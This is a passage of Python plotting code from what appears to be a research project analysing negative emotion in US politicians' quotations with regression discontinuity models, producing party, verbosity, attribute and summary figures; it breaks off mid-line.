\"\"\"\n Creates party comparison plots\n Parameters\n ----------\n folder: Folder that contains verbosity-grouped RDD fits.\n base: Base path to store plots in\n \"\"\"\n\n def _get_party_name(path: Path) -> str:\n if 'without' in path.name:\n return path.name\n model_name = path.name.split('.')[0]\n return model_name.split('_')[-1]\n\n model_files = [file for file in folder.iterdir() if file.name.endswith('pickle') and ('outliers' not in file.name)]\n models = {_get_party_name(p): pickle.load(p.open('rb')) for p in model_files}\n features = [col for col in models['democrats'].data.columns if ('empath' in col) or ('liwc' in col)]\n\n for feature in features:\n fig, ax = plt.subplots(figsize=ONE_COL_FIGSIZE)\n lower, upper = (13926.0, 18578.0) # Hard coded numeric Quotebank Date limits + margin\n\n y_min = np.Inf\n y_max = - np.Inf\n for party, model in models.items():\n # Adapt y-limits of the plot to the scatter values\n y_min = min(y_min, min(model.data[feature]))\n y_max = max(y_max, max(model.data[feature]))\n _scatter_only(ax, feature, model, PARTY_STYLES[party]['color'], s=40)\n _rdd_only(ax, feature, model, PARTY_STYLES[party])\n _conf_only(ax, feature, model, PARTY_STYLES[party]['color'])\n\n y_diff = y_max - y_min\n ax.set_xlim(lower, upper)\n ax.set_ylim(y_min - y_diff, y_max + y_diff)\n ax.legend(loc='lower left', ncol=2, fontsize=FONTSIZE)\n\n title = ', '.join([\n f'$r^2_{\"{DEM, adj}\"}$={models[\"democrats\"].rdd[feature].loc[\"r2_adj\"]:.2f}',\n f'$r^2_{\"{REP, adj}\"}$={models[\"republicans\"].rdd[feature].loc[\"r2_adj\"]:.2f}',\n r'$\\sigma_{DEM}$: ' + f'{models[\"democrats\"].data[feature].std():.2f}',\n r'$\\sigma_{REP}$: ' + f'{models[\"republicans\"].data[feature].std():.2f}',\n ])\n ax.set_title(title, fontsize=FONTSIZE)\n\n hrFeature = feature # Human readable, as used in the tables\n box = '\\n'.join([\n ', '.join([\n r'$\\alpha_{0, DEM}$: ' + str(\n models[\"democrats\"].get_table(asPandas=True).loc[hrFeature][r'$\\alpha_0$']),\n r'$\\beta_{0, DEM}$: ' + str(models[\"democrats\"].get_table(asPandas=True).loc[hrFeature][r'$\\beta_0$']),\n r'$\\alpha_{DEM}$: ' + str(models[\"democrats\"].get_table(asPandas=True).loc[hrFeature][r'$\\alpha$']),\n r'$\\beta_{DEM}$: ' + 
str(models[\"democrats\"].get_table(asPandas=True).loc[hrFeature][r'$\\beta$']),\n ]), ', '.join([\n r'$\\alpha_{0, REP}$: ' + str(\n models[\"republicans\"].get_table(asPandas=True).loc[hrFeature][r'$\\alpha_0$']),\n r'$\\beta_{0, REP}$: ' + str(\n models[\"republicans\"].get_table(asPandas=True).loc[hrFeature][r'$\\beta_0$']),\n r'$\\alpha_{REP}$: ' + str(models[\"republicans\"].get_table(asPandas=True).loc[hrFeature][r'$\\alpha$']),\n r'$\\beta_{REP}$: ' + str(models[\"republicans\"].get_table(asPandas=True).loc[hrFeature][r'$\\beta$'])\n ])\n ])\n box_props = dict(boxstyle='round', facecolor='white', alpha=1)\n ax.text(0.975, 0.95, box, transform=ax.transAxes, fontsize=FONTSIZE - 4, multialignment='center',\n verticalalignment='top', horizontalalignment='right', bbox=box_props)\n\n fig.autofmt_xdate(rotation=75)\n plt.minorticks_off()\n\n saveFigure(fig, base.joinpath(feature))\n plt.close()\n\n # Grid\n fig, axs = grid(models, 5, 1, CORE_FEATURES, PARTY_STYLES, legend=True)\n saveFigure(fig, base.joinpath('grid'))\n plt.close()\n\n\ndef verbosity_plots(folder: Path, base: Path, verbosity_groups: Tuple[int] = (0, 3)):\n \"\"\"\n Creates Verbosity comparison plots\n Parameters\n ----------\n folder: Folder that contains verbosity-grouped RDD fits.\n base: Base path to store plots in\n verbosity_groups: Selection of verbosity groups that shall be plotted\n \"\"\"\n\n def _get_verbosity_number(path: Path) -> int:\n return int(re.search('[0-9]+', path.name)[0])\n\n model_files = [file for file in folder.iterdir() if file.name.endswith('pickle') and ('outliers' not in file.name)]\n models = {_get_verbosity_number(p): pickle.load(p.open('rb')) for p in model_files}\n features = SI_FEATURES\n\n SI_fig, SI_axs = plt.subplots(ncols=7, nrows=4, sharex='all', sharey='all', figsize=LANDSCAPE_FIGSIZE)\n SI_fig.subplots_adjust(wspace=.04, hspace=1, bottom=.3)\n\n lower, upper = (13926.0, 18578.0) # Hard coded numeric Quotebank Date limits + margin\n for feature in features:\n fig, axs = plt.subplots(figsize=NARROW_TWO_COL_FIGSIZE, ncols=4, sharex='all', sharey='all')\n y_min = np.Inf\n y_max = - np.Inf\n\n for verbosity, model in models.items():\n ax = axs[verbosity]\n model.plot(feature, ax=ax, parameters=False, visuals=False, color=STYLES[feature]['color'], lin_reg=False,\n annSize=FONTSIZE - 2, scatter_color=STYLES[feature]['color'])\n if feature in SI_FEATURES:\n model.plot(feature, ax=SI_axs[verbosity][SI_FEATURES.index(feature)], parameters=False, visuals=False,\n color=STYLES[feature]['color'], lin_reg=False, scatter_color=STYLES[feature]['scatter_color'],\n linewidth=2)\n _grid_annotate(SI_axs[verbosity][SI_FEATURES.index(feature)], model, feature, param_y=.95)\n # Adapt y-limits of the plot to mean\n _, Y = model._get_rdd_plot_data(feature)\n y_min = min(y_min, min(Y))\n y_max = max(y_max, max(Y))\n ax.set_title(NAMES[feature] + '\\n' + V_label[verbosity], fontsize=FONTSIZE - 2, fontweight='bold')\n ax.set_title('(' + string.ascii_lowercase[verbosity] + ')\\n', fontfamily='serif', loc='left',\n fontsize=FONTSIZE+2, fontweight='bold')\n\n if verbosity == 0:\n ax.set_ylabel('Pre-campaign z-scores', fontsize=FONTSIZE)\n _grid_annotate(ax, model, feature)\n\n y_diff = y_max - y_min\n for ax in axs:\n ax.set_xlim(lower, upper)\n ax.set_ylim(y_min - y_diff, y_max + y_diff)\n\n fig.autofmt_xdate(rotation=90, ha='left')\n plt.minorticks_off()\n\n saveFigure(fig, base.joinpath(feature))\n\n for i, row in enumerate(SI_axs):\n for j, ax in enumerate(row):\n ax.set_ylim([-7, 7.5])\n ax.set_title('(' + 
('I', 'II', 'III', 'IV')[i] + '.' + string.ascii_lowercase[j] + ')', fontfamily='serif',\n loc='left', fontsize=FONTSIZE-2, fontweight='bold')\n ax.set_title(NAMES[SI_FEATURES[j]], fontsize=FONTSIZE-2, fontweight='bold')\n if j != 0:\n ax.tick_params(axis='y', which='both', left=False, right=False)\n if j == 3:\n ax.text(0.5, 1.33, V_label[i], fontsize=FONTSIZE, fontweight='bold', va='center', ha='center',\n transform=ax.transAxes)\n ax.tick_params(labelbottom=True)\n plt.setp(ax.get_xticklabels(), rotation=90, ha=\"left\")\n\n plt.minorticks_off()\n\n saveFigure(SI_fig, base.joinpath('Verbosity_all'), excludeTightLayout=True)\n plt.close('all')\n\n\ndef attribute_plots(model_path: Path, base: Path):\n attributes = ['Intercept', 'C(threshold)[T.1]', 'time_delta', 'C(threshold)[T.1]:time_delta',\n 'party', 'governing_party', 'congress_member', 'gender']\n annotate = {\n 'gender': ['Male', 'Female'],\n 'party': ['Republicans', 'Democrats'],\n 'congress_member': ['Others', 'Congress'],\n 'governing_party': ['Opposition', 'Government']\n }\n model = pickle.load(model_path.open('rb'))\n\n styles_cpy = {NAMES[key]: val for key, val in STYLES.items()}\n\n ORDER = ['liwc_Negemo', 'liwc_Anger', 'liwc_Anx', 'liwc_Sad', 'liwc_Swear']\n titles = deepcopy(TITLES)\n for key, val in titles.items():\n titles[key] = re.sub(r'\\$(.*)\\$', r'$\\\\mathbf{\\1}$', titles[key])\n\n fig, axs = plt.subplots(figsize=TWO_COL_FIGSIZE, ncols=4, nrows=2)\n for i, att in enumerate(attributes):\n ROW = i // 4\n COL = i % 4\n ax = axs[ROW][COL]\n df = pd.DataFrame(data=None, index=ORDER, columns=['mean', 'low', 'high'])\n\n for feat in ORDER:\n summary = pd.read_html(model.rdd_fit[feat].summary().tables[1].as_html(), header=0, index_col=0)[0]\n lower, upper = summary['[0.025'].loc[att], summary['0.975]'].loc[att]\n mean = summary['coef'].loc[att]\n df.loc[feat] = (mean, lower, upper)\n\n df = df.reindex(ORDER[::-1])\n for _, r in df.iterrows():\n name = NAMES[r.name]\n color = styles_cpy[name]['color']\n ax.plot((r.low, r.high), (name, name), '|-', color='black', linewidth=1.33)\n ax.plot(r['mean'], name, 'o', color=color, markersize=7.5)\n\n if 'time_delta' not in att: # All but betas\n ax.set_xlim([-4.5, 4.5])\n ax.set_xticks([-4, -2, 0, 2, 4])\n ax.set_xlabel('Pre-campaign z-scores', fontsize=FONTSIZE - 2)\n else:\n ax.set_xlim([-0.075, 0.075])\n ax.set_xticks([-0.05, 0, 0.05])\n ax.set_xlabel('Pre-campaign z-scores per month', fontsize=FONTSIZE - 2)\n\n if att in annotate:\n left, right = annotate[att]\n ax.text(x=0.05, y=0.9, s=r'{}$\\longleftarrow$'.format(left), fontsize=FONTSIZE - 2, ha='left',\n va='bottom', transform=ax.transAxes)\n ax.text(x=0.95, y=0.9, s=r'$\\longrightarrow${}'.format(right), fontsize=FONTSIZE - 2, ha='right',\n va='bottom', transform=ax.transAxes)\n\n ax.tick_params(axis='both', labelsize=FONTSIZE - 2)\n ax.set_title(titles[att], fontsize=FONTSIZE - 2, fontweight='bold')\n ax.set_title('(' + string.ascii_lowercase[i] + ')', fontfamily='serif', loc='left', fontsize=FONTSIZE+2, fontweight='bold')\n ax.axvline(x=0, linestyle='dashed', color='black', linewidth=0.5)\n lower, upper = ax.get_ylim()\n ax.set_ylim(lower - .5, upper + .5)\n\n if COL in (1, 2):\n ax.set_yticklabels([])\n ax.tick_params(axis='y', which='both', left=False, right=False)\n\n if COL == 3:\n ax.yaxis.tick_right()\n\n plt.tight_layout()\n saveFigure(fig, base.joinpath('selected_attributes'))\n plt.close()\n\n\ndef plot_quantities(data_path: Path, base: Path):\n \"\"\"\n Plots some quantitative overview stats.\n Parameters\n 
----------\n data_path: csv file\n base: Image folder\n \"\"\"\n print('Monthly quotes and speakers')\n df = pd.read_csv(data_path)\n df['dt_month'] = df.apply(lambda r: datetime(int(r.year), int(r.month), 15), axis=1)\n fig, axs = plt.subplots(figsize=ONE_COL_FIGSIZE, nrows=2)\n for i, col, name in ((0, 'num_speaker', 'Monthly Speakers'), (1, 'num_quotes', 'Unique Monthly Quotations')):\n fig, ax = timeLinePlot(x=df.dt_month,\n y=df[col],\n kind='scatter',\n snsargs={'color': 'black'},\n ax=axs[i])\n drop_mask = df.dt_month.isin(DROPPED_DATA)\n fig, ax = timeLinePlot(x=df.dt_month[drop_mask],\n y=df[col][drop_mask],\n kind='scatter',\n snsargs={'color': 'grey'},\n ax=axs[i])\n ax.set_title(name, fontsize=FONTSIZE)\n ax.set_xlim(13926.0, 18578.0)\n\n axs[0].set_ylim([0, 11000])\n axs[0].set_yticks([5000, 10000])\n axs[1].set_ylim([0, 300000])\n axs[1].set_yticks([100000, 200000])\n\n saveFigure(fig, base.joinpath('quantities.pdf'))\n plt.close()\n\n\ndef RDD_kink_performance(data_path: Path, base: Path):\n \"\"\"\n Plots the performance of the RDD, depending on the date of the discontinuity / kink\n \"\"\"\n data = pickle.load(data_path.open('rb'))\n if 'YouGov' in str(data_path):\n base = base.joinpath('YouGov')\n base.mkdir(exist_ok=True)\n dates = list(data.keys())\n ylabeltext = r\"$R^2_{\\mathrm{adj}}$\"\n fig, ax = plt.subplots(figsize=TWO_COL_FIGSIZE)\n rdd_style = deepcopy(STYLES)\n for f in rdd_style:\n try:\n del rdd_style[f]['scatter_color']\n except KeyError:\n pass\n\n for feature in CORE_FEATURES:\n timeLinePlot(\n x=dates,\n y=[data[dt][feature]['r2_adjust'] for dt in dates],\n snsargs=dict(label=NAMES[feature], **{key: val for key, val in rdd_style[feature].items() if key !='label'}),\n ax=ax,\n includeElections=False\n )\n ax.axvline(mdates.date2num(KINK), color='black', linestyle='--')\n plt.legend(fontsize=FONTSIZE, loc='upper right', framealpha=1, fancybox=False, ncol=3)\n ax.set_ylabel(ylabeltext, fontsize=FONTSIZE)\n saveFigure(fig, base.joinpath('r2_adj'))\n\n fig, ax = plt.subplots(figsize=TWO_COL_FIGSIZE)\n timeLinePlot(\n x=dates,\n y=[data[dt]['liwc_Posemo']['r2_adjust'] for dt in dates],\n snsargs=dict(label=NAMES['liwc_Posemo'], **rdd_style['liwc_Posemo']),\n ax=ax,\n includeElections=False)\n ax.axvline(mdates.date2num(KINK), color='black', linestyle='--')\n plt.legend(fontsize=FONTSIZE - 2, loc='upper right', framealpha=1, fancybox=False, ncol=3)\n ax.set_ylabel(ylabeltext, fontsize=FONTSIZE)\n saveFigure(fig, base.joinpath('r2_adj_posemo'))\n\n fig, ax = plt.subplots(figsize=TWO_COL_FIGSIZE)\n for feature in ['empath_negative_emotion', 'empath_swearing_terms']:\n timeLinePlot(\n x=dates,\n y=[data[dt][feature]['r2_adjust'] for dt in dates],\n snsargs=dict(label=re.sub('\\n', ' ', NAMES[feature]), **rdd_style[feature]),\n ax=ax,\n includeElections=False\n )\n ax.axvline(mdates.date2num(KINK), color='black', linestyle='--')\n plt.legend(fontsize=FONTSIZE, loc='upper right', framealpha=1, fancybox=False, ncol=1)\n ax.set_ylabel(ylabeltext, fontsize=FONTSIZE)\n saveFigure(fig, base.joinpath('r2_empath'))\n\n plt.close('all')\n\n\ndef aggregation_overview(QuotationAggregation_RDD: RDD, SpeakerAggregation_RDD: RDD, democrats: RDD, republicans: RDD,\n folder: Path):\n \"\"\"\n Combines the plots for the three key aggregations (Quotations, Speaker, Party) in one figure.\n Parameters\n ----------\n QuotationAggregation_RDD: RDD model of the quotation aggregation\n SpeakerAggregation_RDD: RDD model of the speaker aggregation\n democrats: RDD model of the quotation 
aggregation for democrats\n republicans: RDD model of the quotation aggregation for republicans\n folder: Where to store the plot\n \"\"\"\n print('Large Aggregation Grid')\n democratStyle = deepcopy(STYLES)\n republicanStyle = deepcopy(STYLES)\n for key in republicanStyle:\n republicanStyle[key]['color'] = 'grey'\n republicanStyle[key]['scatter_color'] = 'grey'\n republicanStyle[key]['label'] = 'Republicans'\n democratStyle[key]['label'] = 'Democrats'\n partyStyle = {'democrats': democratStyle, 'republicans': republicanStyle}\n\n fig, axs = plt.subplots(ncols=5, nrows=3, figsize=[NARROW_TWO_COL_FIGSIZE[0], 3 * NARROW_TWO_COL_FIGSIZE[1]], sharey='all')\n plt.subplots_adjust(wspace=.04, hspace=.6, bottom=.3)\n\n quot = axs[0, :]\n speak = axs[1, :]\n party = axs[2, :]\n\n grid({'agg': QuotationAggregation_RDD}, 5, 1, CORE_FEATURES, STYLES, grid_annotate=True, fontsize=FONTSIZE-2,\n ylabel='Pre-campaign z-scores', axs=quot)\n grid({'agg': SpeakerAggregation_RDD}, 5, 1, CORE_FEATURES, STYLES, grid_annotate=True, fontsize=FONTSIZE-2,\n ylabel='Pre-campaign z-scores', axs=speak, prefix=string.ascii_lowercase[5:])\n\n grid({'democrats': democrats, 'republicans': republicans}, 5, 1, CORE_FEATURES, partyStyle, fontsize=FONTSIZE-2,\n grid_annotate=False, ylabel='Pre-campaign z-scores', axs=party, prefix=string.ascii_lowercase[10:],\n legend=True)\n\n txt = ['Quote-level aggregation', 'Speaker-level aggregation', 'Quote-level aggregation by party']\n for i, row in enumerate(axs):\n for j, ax in enumerate(row):\n ax.set_ylim([-7, 7])\n if j == 2:\n ax.text(0.5, 1.2, txt[i], fontsize=FONTSIZE, fontweight='bold', va='center', ha='center',\n transform=ax.transAxes)\n ax.tick_params(labelbottom=True)\n plt.setp(ax.get_xticklabels(), rotation=90, ha=\"left\")\n\n saveFigure(fig, folder.joinpath('Negativity.pdf'), excludeTightLayout=True)\n\n # Positive\n fig, axs = plt.subplots(ncols=3, nrows=1, figsize=NARROW_TWO_COL_FIGSIZE, sharex='all', sharey='all')\n _scatter_only(axs[0], 'liwc_Posemo', QuotationAggregation_RDD, STYLES['liwc_Posemo']['color'], s=40)\n axs[0].set_title(NAMES['liwc_Posemo'] + '\\n' + txt[0], fontweight='bold', fontsize=FONTSIZE)\n axs[0].set_ylabel('Pre-campaign z-scores', fontsize=FONTSIZE)\n axs[0].set_title('(a)', fontfamily='serif', loc='left', fontsize=FONTSIZE+2, fontweight='bold')\n\n _scatter_only(axs[1], 'liwc_Posemo', SpeakerAggregation_RDD, STYLES['liwc_Posemo']['color'], s=40)\n axs[1].set_title(NAMES['liwc_Posemo'] + '\\n' + txt[1], fontweight='bold', fontsize=FONTSIZE)\n axs[1].set_title('(b)', fontfamily='serif', loc='left', fontsize=FONTSIZE+2, fontweight='bold')\n\n timeLinePlot(democrats.data.date, democrats.data['liwc_Posemo'], ax=axs[2],\n snsargs={'s': 40, 'color': STYLES['liwc_Posemo']['color'], 'label': 'Democrats'},\n kind='scatter')\n timeLinePlot(republicans.data.date, republicans.data['liwc_Posemo'], ax=axs[2],\n snsargs={'s': 40, 'color': 'grey', 'label': 'Republicans'},\n kind='scatter')\n axs[2].set_title(NAMES['liwc_Posemo'] + '\\n' + txt[2], fontweight='bold', fontsize=FONTSIZE)\n axs[2].set_title('(c)', fontfamily='serif', loc='left', fontsize=FONTSIZE+2, fontweight='bold')\n axs[2].legend(loc='lower center', ncol=2)\n\n fig.autofmt_xdate(rotation=90, ha='left')\n plt.minorticks_off()\n\n saveFigure(fig, folder.joinpath('Positive.pdf'))\n\n\ndef title_figure(president_verbosity: pd.DataFrame, raw_negemo: pd.DataFrame, quoteAggregationRDD: RDD, folder: Path):\n \"\"\"\n Plots the raw liwc score of the negative emotion liwc category vs. 
the relative share of quotes\n uttered by Donald Trump vs Barack Obama\n \"\"\"\n # Custom Legend Patches (multicolor) for the background\n # From: https://stackoverflow.com/questions/31908982/python-matplotlib-multi-color-legend-entry\n class MulticolorPatch:\n def __init__(self, colors):\n self.colors = colors\n\n class MulticolorPatchHandler:\n def legend_artist(self, legend, orig_handle, fontsize, handlebox):\n width, height = handlebox.width, handlebox.height\n patches = []\n for i, c in enumerate(orig_handle.colors):\n patches.append(\n plt.Rectangle(\n (float(width / len(orig_handle.colors) * i - handlebox.xdescent), float(-handlebox.ydescent)),\n width / len(orig_handle.colors),\n height,\n facecolor=c,\n edgecolor='none'\n )\n )\n patch = PatchCollection(patches, match_original=True)\n\n handlebox.add_artist(patch)\n return patch\n print('Title Figure')\n dates = sorted(raw_negemo['date'].unique())\n shares = pd.DataFrame(data=None, columns=['trump', 'obama', 'total'],\n index=dates)\n for dt in shares.index:\n total = president_verbosity[president_verbosity.date == dt]['numQuotes'].sum()\n trump = president_verbosity[(president_verbosity.date == dt) & (president_verbosity.qid == 'Q22686')] \\\n ['numQuotes'].iloc[0]\n obama = president_verbosity[(president_verbosity.date == dt) & (president_verbosity.qid == 'Q76')] \\\n ['numQuotes'].iloc[0]\n shares.at[dt, 'trump'] = trump\n shares.at[dt, 'obama'] = obama\n shares.at[dt, 'total'] = total\n\n fig, (left, right) = plt.subplots(figsize=TWO_COL_FIGSIZE, ncols=2)\n # fig, left_axis = plt.subplots(figsize=TWO_COL_FIGSIZE)\n presidents = left.twinx()\n\n leftStyle = {'label': 'Negative emotion (all politicians)', 'color': 'black', 'linewidth': 3}\n fig, left = timeLinePlot(x=dates, y=raw_negemo.liwc_Negemo,\n snsargs=leftStyle,\n kind='line',\n ax=left,\n zorder=1,\n includeElections=False)\n fig, left = timeLinePlot(x=dates, y=raw_negemo.liwc_Negemo,\n snsargs={'color': 'black', 's': 50, 'edgecolor': 'black'},\n kind='scatter',\n ax=left,\n zorder=1,\n includeElections=False)\n\n left.set_ylabel('Negative emotion score', fontsize=FONTSIZE)\n left.axvline(x=mdates.date2num([datetime(2015, 6, 15)])[0], color='tab:red', linewidth=2.5)\n left.text(0.59, 0.05, \"June 2015: Beginning of\\nTrump's primary campaign\", transform=left.transAxes,\n color='tab:red', fontsize=FONTSIZE, fontweight='bold')\n left.set_xlim(*mdates.date2num([min(dates)]), *mdates.date2num([max(dates)]))\n left.set_facecolor('none')\n\n presidents.set_ylim([0, 1])\n presidents.set_yticklabels([])\n presidents.tick_params(axis='y', which='both', right=False)\n presidents.set_facecolor('none')\n\n colorTrump = (0.8392156862745098, 0.15294117647058825, 0.1568627450980392, 0.4)\n colorObama = (0.05, 0.48, 1, 0.75)\n presidents.fill_between(mdates.date2num(dates), np.zeros(len(dates)),\n np.asarray(shares.trump / shares.total, dtype=float), color=colorTrump,\n step='mid', zorder=0)\n presidents.fill_between(mdates.date2num(dates), np.asarray(shares.trump / shares.total, dtype=float),\n np.ones(len(dates)), color=colorObama, step='mid', zorder=0)\n\n for election in PRESIDENTIAL_ELECTIONS:\n left.axvline(x=election, linewidth=2, c='black', linestyle='dotted', zorder=1, alpha=.3)\n electionLines = Line2D([0], [0], linewidth=2, c='black', linestyle='dotted', alpha=.3)\n backgroundColors = MulticolorPatch([colorTrump, colorObama])\n handles, labels = left.get_legend_handles_labels()\n left.get_legend().remove()\n left.legend(handles=handles + [electionLines, 
backgroundColors],\n labels=labels + ['Presidential elections', 'Trump/Obama quote share'],\n loc='upper left',\n handler_map={MulticolorPatch: MulticolorPatchHandler()})\n\n # Right plot\n settings = dict(ci=False, lin_reg=False, annotate=False, visuals=False,\n ylabel='Negative emotion (pre-campaign z-scores)', color=STYLES['liwc_Negemo']['color'],\n includeElections=False, s=50)\n quoteAggregationRDD.plot('liwc_Negemo', right, **settings)\n\n # Slope and Intercepts\n t_thresh = mdates.date2num(KINK)\n alpha_0_val = quoteAggregationRDD.rdd['liwc_Negemo']['Intercept']\n alpha_val = quoteAggregationRDD.rdd['liwc_Negemo']['C(threshold)[T.1]']\n beta_0_val = quoteAggregationRDD.rdd['liwc_Negemo']['time_delta']\n beta_val = quoteAggregationRDD.rdd['liwc_Negemo']['C(threshold)[T.1]:time_delta']\n alpha_0 = dict(x=t_thresh + 300, y=0, dx=0, dy=alpha_0_val, color='green')\n alpha_0_styling = dict(text=r'intercept $\\mathbf{\\alpha_0}$', fraction_dy=.5, x=t_thresh + 330, align='left')\n alpha = dict(x=t_thresh, y=alpha_0_val, dx=0, dy=alpha_val, color=(1, .65, 0))\n alpha_styling = dict(text=r'campaign offset $\\mathbf{\\alpha}$', fraction_dy=.9, x=t_thresh - 60, align='right')\n\n def reverseDirection(d):\n ret = deepcopy(d)\n ret['x'] = d['x'] + d['dx']\n ret['dx'] = - d['dx']\n ret['y'] = d['y'] + d['dy']\n ret['dy'] = - d['dy']\n d['linewidth'] = 0\n return ret\n\n arrowStyle = dict(length_includes_head=True, linewidth=3, head_width=75, head_length=0.2, joinstyle='bevel', zorder=2)\n right.hlines([0, alpha_0['dy']], [t_thresh, t_thresh], [t_thresh + 300, t_thresh + 300], colors='black', linewidth=2)\n for style, param in zip([alpha_0_styling, alpha_styling], [alpha_0, alpha]):\n name = style['text']\n right.arrow(**param, **arrowStyle)\n # right.arrow(**reverseDirection(param), **arrowStyle)\n right.text(style['x'], param['y'] + style['fraction_dy'] * param['dy'], name, color=param['color'],\n ha=style['align'], va='center', fontsize=FONTSIZE + 2, fontweight='bold')\n\n def x_at(delta: int) -> int:\n deltaFromZero = delta + quoteAggregationRDD.rdd['liwc_Negemo']['split_0']\n return mdates.date2num(quoteAggregationRDD._get_approx_date(deltaFromZero))\n\n def y_at(delta: int) -> float:\n if delta < 0:\n return alpha_0_val + beta_0_val * delta\n else:\n return alpha_0_val + alpha_val + (beta_val + beta_0_val) * delta\n\n patchColor = (0.1, 0.4, 1, 0.4)\n beta_0 = dict(x1=-65, x2=-45, text=r'slope $\\mathbf{\\beta_0}$', y_offset=0.1)\n beta = dict(x2=20, x1=55, text=r'slope $\\mathbf{\\beta_0 + \\beta}$', y_offset=0.2)\n patches = []\n for param in [beta_0, beta]:\n x1 = x_at(param['x1'])\n y1 = y_at(param['x1'])\n x2 = x_at(param['x2'])\n y2 = y_at(param['x2'])\n edges = np.array([[x1, y1], [x2, y1], [x2, y2]])\n x_text = x1 + 0.5 * (x2 - x1)\n y_text = max(y1, y2) + param['y_offset']\n right.text(x_text, y_text, param['text'], color=patchColor[:3], ha='center', va='bottom', fontsize=FONTSIZE + 2, fontweight='bold')\n patches.append(Polygon(xy=edges, fill=True, zorder=2))\n\n col = PatchCollection(patches, facecolors=patchColor)\n right.add_collection(col)\n\n equation = r\"$y_t = \\mathbf{\\alpha_0} + \\mathbf{\\beta_0} \\,t + \\mathbf{\\alpha} \\,i_{t} + \\mathbf{\\beta} \\,i_{t} \\,t + \\varepsilon_{t}$\"\n box_props = dict(boxstyle='round', facecolor='white', alpha=.5, ec='none')\n right.text(0.5, 0.85, equation, transform=right.transAxes, fontsize=FONTSIZE + 2, verticalalignment='bottom', horizontalalignment='center', bbox=box_props)\n\n old_ylim = right.get_ylim()\n 
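 # Mark the campaign-onset kink (t = 0) with a red 'X' sitting on the x-axis; clip_on=False allows drawing on the axis line itself, and the saved y-limits are restored right below so the marker does not stretch the plot.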
right.scatter(mdates.date2num(KINK), old_ylim[0], s=100, marker='X', color='tab:red', clip_on=False, zorder=100)\n right.set_ylim(old_ylim) # Prevent that scatter above moves the limit around\n right.text(mdates.date2num(KINK) + 50, right.get_ylim()[0] + 0.15, '$t = 0$ (June 2015)', fontsize=FONTSIZE, color='tab:red')\n\n right.set_xlim(*mdates.date2num([min(dates)]), *mdates.date2num([max(dates)]))\n right.axhline(y=0, linestyle='--', color='black', linewidth=0.8, zorder=0)\n plt.tight_layout()\n\n # saveFigure(fig, folder.joinpath('Fig0.pdf'))\n # left_extend = left.get_window_extent().transformed(fig.dpi_scale_trans.inverted()).expanded(1.1, 1.1)\n # saveFigure(fig, folder.joinpath('Title_figure_left.pdf'), bbox_inches=left_extend)\n # right_extend = right.get_window_extent().transformed(fig.dpi_scale_trans.inverted()).expanded(1.1, 1.2)\n # saveFigure(fig, folder.joinpath('Title_figure_right.pdf'), bbox_inches=right_extend)\n plt.close()\n\n\ndef SI_additionals(data: Path, SI: Path):\n \"\"\"Assumes the default file structure is kept\"\"\"\n # Aggregations with and without Outliers\n print('Aggregations with and without outliers')\n fig, axs = plt.subplots(ncols=7, nrows=4, figsize=LANDSCAPE_FIGSIZE, sharey='all')\n plt.subplots_adjust(wspace=.04, hspace=.6, bottom=.3)\n QA = pickle.load(data.joinpath('QuotationAggregation_RDD.pickle').open('rb'))\n QA_out = pickle.load(data.joinpath('QuotationAggregation_RDD_outliers.pickle').open('rb'))\n SA = pickle.load(data.joinpath('SpeakerAggregation_RDD.pickle').open('rb'))\n SA_out = pickle.load(data.joinpath('SpeakerAggregation_RDD_outliers.pickle').open('rb'))\n\n grid({'': QA}, 7, 1, SI_FEATURES, STYLES, grid_annotate=True, fontsize=FONTSIZE-2, lin_reg=False,\n ylabel='Pre-campaign z-scores', axs=axs[0], prefix=string.ascii_uppercase)\n grid({'': QA_out}, 7, 1, SI_FEATURES, STYLES, grid_annotate=True, fontsize=FONTSIZE-2, lin_reg=False, ylabel='Pre-campaign z-scores', axs=axs[1],\n prefix=string.ascii_lowercase)\n grid({'': SA}, 7, 1, SI_FEATURES, STYLES, grid_annotate=True, fontsize=FONTSIZE-2, lin_reg=False, ylabel='Pre-campaign z-scores', axs=axs[2],\n prefix=string.ascii_uppercase[7:])\n grid({'': SA_out}, 7, 1, SI_FEATURES, STYLES, grid_annotate=True, fontsize=FONTSIZE-2, lin_reg=False, ylabel='Pre-campaign z-scores', axs=axs[3],\n prefix=string.ascii_lowercase[7:])\n\n txt = ['Quote-level aggregation', 'Quote-level aggregation, outliers removed', 'Speaker-level aggregation', 'Speaker-level aggregation, outliers removed']\n for i, row in enumerate(axs):\n for j, ax in enumerate(row):\n ax.set_ylim([-5, 6])\n if j == 3:\n ax.text(0.5, 1.2, txt[i], fontsize=FONTSIZE, fontweight='bold', va='center', ha='center',\n transform=ax.transAxes)\n ax.tick_params(labelbottom=True)\n plt.setp(ax.get_xticklabels(), rotation=90, ha=\"left\")\n\n saveFigure(fig, SI.joinpath('ALL_AGG.pdf'), excludeTightLayout=True)\n\n # Scatters Only\n print('Scatter only including empath')\n fig, axs = plt.subplots(ncols=7, nrows=2, figsize=LANDSCAPE_NARROW_FIGSIZE, sharey='all')\n plt.subplots_adjust(wspace=.04, hspace=.6, bottom=.3)\n\n scatter_grid(1, 7, QA, SI_FEATURES, axs=axs[0], fontsize=FONTSIZE-2)\n scatter_grid(1, 7, SA, SI_FEATURES, axs=axs[1], prefix=string.ascii_lowercase[7:], fontsize=FONTSIZE-2)\n\n txt = ['Quote-level aggregation', 'Speaker-level aggregation']\n for i, row in enumerate(axs):\n for j, ax in enumerate(row):\n # ax.set_ylim([-7, 7])\n if j == 3:\n ax.text(0.5, 1.2, txt[i], fontsize=FONTSIZE, fontweight='bold', va='center', ha='center',\n 
transform=ax.transAxes)\n ax.tick_params(labelbottom=True)\n plt.setp(ax.get_xticklabels(), rotation=90, ha=\"left\")\n\n saveFigure(fig, SI.joinpath('Negativity_Scatter.pdf'), excludeTightLayout=True)\n\n # All Individuals\n print('Individuals Grid SI')\n fig, axs = plt.subplots(nrows=5, ncols=6, figsize=[LANDSCAPE_FIGSIZE[0], LANDSCAPE_FIGSIZE[1] * 1.1], sharey='all')\n name2qid = {val: key for key, val in POLITICIAN_IDS.items()}\n plt.subplots_adjust(wspace=.04, hspace=.55, bottom=.3)\n Obama = pickle.load(data.joinpath('Individuals').joinpath(name2qid['Barack Obama'] + '_RDD.pickle').open('rb'))\n Trump = pickle.load(data.joinpath('Individuals').joinpath(name2qid['Donald Trump'] + '_RDD.pickle').open('rb'))\n Biden = pickle.load(data.joinpath('Individuals').joinpath(name2qid['Joe Biden'] + '_RDD.pickle').open('rb'))\n Romney = pickle.load(data.joinpath('Individuals').joinpath(name2qid['Mitt Romney'] + '_RDD.pickle').open('rb'))\n Pence = 